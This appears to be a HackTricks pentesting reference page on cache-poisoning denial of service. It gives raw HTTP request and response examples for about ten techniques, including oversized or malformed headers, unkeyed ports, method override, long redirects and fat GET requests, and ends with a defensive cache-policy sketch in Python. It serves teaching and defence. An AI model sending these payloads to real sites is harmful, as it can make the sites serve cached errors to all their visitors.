Cache Poisoning to DoS

Tip

Learn and practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Caution

On this page you can find different variations to try to make the web server respond with errors to requests that are valid for the cache servers.

  • HTTP Header Oversize (HHO)

Send a request with a header size larger than the one supported by the web server but smaller than the one supported by the cache server. The web server will respond with a 400 response, which might be cached:

GET / HTTP/1.1
Host: redacted.com
X-Oversize-Hedear:Big-Value-000000000000000

  • HTTP Meta Character (HMC) and unexpected values

For the attack to work, you must first bypass the cache. Send a header that contains harmful meta characters.

GET / HTTP/1.1
Host: redacted.com
X-Meta-Hedear:Bad Chars\n \r

A badly configured header could be just \: as a header.

This could also work if unexpected values are sent, for example an unexpected Content-Type:

GET /anas/repos HTTP/2
Host: redacted.com
Content-Type: HelloWorld

  • Unkeyed header

Some websites return an error status code if the request contains certain specific headers, such as the X-Amz-Website-Location-Redirect: someThing header.

GET /app.js HTTP/2
Host: redacted.com
X-Amz-Website-Location-Redirect: someThing

HTTP/2 403 Forbidden
Cache: hit

Invalid Header

  • HTTP Method Override Attack (HMO)

If the server supports changing the HTTP method with headers such as X-HTTP-Method-Override, X-HTTP-Method or X-Method-Override, it is possible to request a valid page while changing the method. Because the server does not support that method, a bad response gets cached:

GET /blogs HTTP/1.1
Host: redacted.com
HTTP-Method-Override: POST

  • Unkeyed port

If the port in the Host header is reflected in the response and is not included in the cache key, it is possible to redirect to an unused port:

GET /index.html HTTP/1.1
Host: redacted.com:1

HTTP/1.1 301 Moved Permanently
Location: https://redacted.com:1/en/index.html
Cache: miss

  • Long Redirect DoS

As in the following example, x is not being cached, so an attacker could abuse the redirect response behaviour to make the redirect send a URL so big that it returns an error. Then, people trying to access the URL without the uncached x key will get the error response:

GET /login?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com

HTTP/1.1 301 Moved Permanently
Location: /login/?x=veryLongUrl
Cache: hit

GET /login/?x=veryLongUrl HTTP/1.1
Host: www.cloudflare.com

HTTP/1.1 414 Request-URI Too Large
CF-Cache-Status: miss

  • Host header case normalization

The Host header should be case insensitive, but some websites expect it to be lowercase and return an error if it is not:

GET /img.png HTTP/1.1
Host: Cdn.redacted.com

HTTP/1.1 404 Not Found
Cache:miss

Not Found

  • Path normalization

Some pages return error codes when data is sent URL-encoded in the path, but the cache server URL-decodes the path and stores the response for the URL-decoded path:

GET /api/v1%2e1/user HTTP/1.1
Host: redacted.com


HTTP/1.1 404 Not Found
Cache: miss

Not Found

  • Fat Get

Some cache servers, such as Cloudflare, or web servers reject GET requests that have a body, so this could be abused to cache an invalid response:

GET /index.html HTTP/2
Host: redacted.com
Content-Length: 3

xyz


HTTP/2 403 Forbidden
Cache: hit
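
Seen from the cache operator's side, most of the variants above stop working once the cache keys on exactly what it forwards to the origin and stores error responses only when the origin opts in. The sketch below is an added example, not HackTricks or vendor code; the function names, the default port and the opt-in policy for errors are assumptions.

```python
# Hypothetical cache-side policy; every name here is illustrative, not a product API.
OVERRIDE_HEADERS = {"x-http-method-override", "x-http-method",
                    "x-method-override", "http-method-override"}

def canonical_request(method, host_header, target, default_port=443):
    """Return (host_to_forward, cache_key). The origin must receive exactly
    what is keyed, so no unkeyed variation can change its answer."""
    raw = host_header.strip()
    host, sep, port = raw.rpartition(":")
    if sep and port.isdigit():
        host, port = host.lower(), int(port)        # explicit port is keyed
    else:
        host, port = raw.lower(), default_port      # host case is normalized
    forward_host = host if port == default_port else f"{host}:{port}"
    # The target stays byte-for-byte: no URL decoding, query string included.
    return forward_host, (method.upper(), host, port, target)

def should_store(method, status, req_headers, resp_headers):
    """Decide whether a response may enter the shared cache."""
    req = {k.lower(): v for k, v in req_headers.items()}
    resp = {k.lower(): v for k, v in resp_headers.items()}
    if method.upper() != "GET":
        return False
    # Fat GET: a request body is never part of the key, so never cache its result.
    if req.get("content-length", "0").strip() not in ("", "0") or "transfer-encoding" in req:
        return False
    # Method-override headers change origin behaviour without changing the key.
    if OVERRIDE_HEADERS & req.keys():
        return False
    directives = {d.strip().split("=")[0].lower()
                  for d in resp.get("cache-control", "").split(",") if d.strip()}
    if directives & {"no-store", "private"}:
        return False
    # Assumed policy: 4xx/5xx are stored only on explicit opt-in by the origin.
    if status >= 400:
        return bool(directives & {"max-age", "s-maxage"})
    return True
```

On the origin side, the matching control is to send Cache-Control: no-store on error pages so that a cache with a looser policy still does not keep them.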
